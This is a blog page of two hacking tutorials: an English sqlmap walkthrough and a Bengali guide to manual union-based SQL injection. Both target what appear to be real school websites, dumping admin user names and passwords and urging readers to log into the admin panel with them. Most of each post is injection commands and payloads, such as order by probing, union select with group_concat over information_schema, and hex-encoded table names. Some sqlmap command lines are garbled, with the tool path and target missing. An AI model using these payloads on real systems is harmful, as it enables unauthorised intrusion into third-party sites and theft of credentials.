Showing posts with label SQL Injection Tutorial. Show all posts
SQL Map Step by Step Tutorial
By : Unknown
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
its a python tool , and it is preloaded in almost every Back Track version
first of all
we need a vulnerable target!
here it is
ok first step is to fatch the databases
command will be like this one
python ./ -u --dbs
-u is stand for which is vulnerable to SQL injection
and --dbs is used for fatching total databases in website :D
ok after completing the process of fataching the databases it will something like that
available databases(8)
now we are going to expoit database alliedschools_web and fatch the tables present in it XD
ok command will change a little bit :-
python ./ -u -D alliedschools_web --tables
here :-
-D and then name of the database from which we want to fatch tables and
--tables is for fatching total table present in the database
after processing we will get the tables present in database "alliedschools_web"
after processing we will get something like that
Database: alliedschools_campus
[18 Tables ]
now we are going to fatch the cloumns from table admin of database alliedschools_campus
command is :-
python ./ -u -D alliedschools_campus -T admin --columns
now we will get something like this
Database: alliedschools_campus
Table : admin
[12 columns ]
This is the last command to get the admin username and password
command is
python ./ -u -D alliedschools_campus -T admin -C admin_password, admin_username --dump
- See more at: after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ......
Now You Have admin Password of website, Find admin panel and ...xD
Tag :
SQL Injection Tutorial,
Union Based SQL Injection Tutorial (বাংলা)
By : Unknown
প্রথমে আমরা একটি SQL Injectble Site খুজে বের করি theke .
আমি এই সাইট টা পেলাম Dork ব্যবহার করে । এখন দেখতে হবে সাইট টা SQL Injectble কিনা । এখন আইডি ভ্যালু এর পরে ( ' ) দিলে যদি কোন এরর অথবা কোন কিছু সাইট থেকে মিস করে যেমন যে কোন একটা ছবি মিস করল সাইট থেকে তাহলে বুজতে হবে সাইট টা SQL Injectble :D
আমি সাইট টি ভুলনারবল কিনা চেক করলাম সেই সাইট এর শেষে ( ' ) দিয়ে ।
command : '
সাইট থেকে এই রকম একটা এরর দিবে
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aclsiosj/public_html/news.php on line 27
এর মানে সাইট টি শকল ভুলনারবল ।
এছাড়া আর কিছু এরর আস্তে পারে ভয় পাবার কিছু নেই :) ;)
এরর গুলু নিচে মত
Warrning:You have an error in your SQL syntax
Warning: mysql_fetch_array()
Warning: getimagesize()
Warning: session_start()
Warning: mysql_num_rows()
Warning: mysql_query()
Warning: array_merge()
Warning: preg_match()
Warning: ilesize()
Warning: filesize()
এরপর কলাম সংখ্যা বের করতে হবে ।
command : +order+by+1--
সাইট এর শেষে
যতখুন পর্যন্ত কন এরর না দিবে ততখুন পর্যন্ত ১,২,৩,৪,৫,৬,৭,৮,৯ এভাবে করে সামনের দিকে যেতে হবে ।
নিচের মতো
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
কোন এরর নেই
এরর ।
তার মানে ৮ টি কলাম আছে ৯ নাম্বার কলাম নেই তাই এরর দিয়েছে +order+by+9-- দেবার পর ।
আমরা কলাম সংখ্যা ৮ বের করলাম :)
এখন ভুলনারবল কলাম বের করতে হবে ।
যে কয়টি কলাম আছে +union+select+ এরপর কলাম সংখ্যা লিখতে হবে ।
এভাবে ১-৮ পর্যন্ত দেয়া হইছে কারন কলাম সংখ্যা ৮ ।
দেখা যাবে সাইট এ কিছু নাম্বার আসবে যেই নাম্বার আসবে সেইটা হচ্ছে ভুলনারবল কলাম নাম্বার । আমাদের সাইট এর ভুলনারবল্কলাম নাম্বার ৩ এবং ৪ ।
এরপর ভার্সন বের করতে হবে কারন ভার্সন ৫ এর নিছে হলে এই মেথড কাজ করবে না ।
তাই ভার্সন ৫ কিনা তা দেখতে হবে ।
command: version()
৩ আবন ৪ নাম্বার কলাম ভুলনারবল ছিল তাই আমি ৩ নাম্বারে version() দিলাম
5.0.84-percona-highperf-b18-log ভার্সন বের হল ।
ভার্সন ৫ তাই আমরা সামনের দিকে Inject করব। :D
এখন টেবিল এর ডাটা বের করতে হবে :D
command : version() এর যায়গায় group_concat(table_name)
এবং শেষে
+from+ information_schema.tables+where+table_schema=database()--
অ্যাড করতে হবে ।,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--
সাইট এর টেবিল নাম গুলু আসবে :D
নিচের গুলু টেবিল নাম
এখানে খুজতে হবে কোন টেবিল এর ভিতর ইউজার পাসওয়ার্ড থাকতে পারে :)
এখানে user_master টেবিলে ইউজার পাসওয়ার্ড থাকতে পারে এই কলাম তারগেত করে সামনের কাজ করতে হবে ।
user_master কে হেক্সে রুপান্তর করতে হবে
user_master এর হেক্স 757365725F6D6173746572
এই দুইটি অনলাইন সাইট থেকে টেক্সট কে হেক্সে রুপান্তর করা যায় :D
এখন কলাম নাম বের করতে হবে ।
command : group_concat(table_name) এর যায়গায় group_concat(column_name)
এবং শেষে
+from+information_schema.columns+where+table_name=0x(টেবিল এর হেক্স),2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=0x757365725F6D6173746572--
কলাম এর ভিতর এই ডাটা গুলু আছে
এর ভিতর user_name,password এই দুইটি তে ইউজার এবং পাসওয়ার্ড থাকবে :D
এখন ইউজার পাসওয়ার্ড বের করতে হবে
command : group_concat(column_name) এর column_name এর যায়াগায় ইউজার এবং পাসওয়ার্ড কলামের নাম দিতে হবে
কলাম সংখা গুলুর পর +from+(এখানে অ্যাডমিন টেবিলের নাম),2,group_concat(user_id,0x3a,password),4,5,6,7,8+from+user_master--
এখানে অ্যাডমিন টেবিল নাম user_master তাই +from+ এর পর user_master দেয়া হয়েছে
ইউজার নাম এবং পাসওয়ার্ড পেয়ে গেছেন ;) :D
এখন অ্যাডমিন প্যানেল এর URL বের করে সাইটে লগিন করবেন ;)
অনেক সাইট এর পাসওয়ার্ড হ্যাঁস আকারে থাকে । হ্যাঁস ক্র্যাক করে পাসওয়ার্ড বের করতে হয় ।
হ্যাঁস নিয়ে পরের টিওটরিয়াল দেয়া হবে :)
হ্যাপি এস কিউ এল ইঞ্জেকশান :D :D :D
Tag :
SQL Injection Tutorial,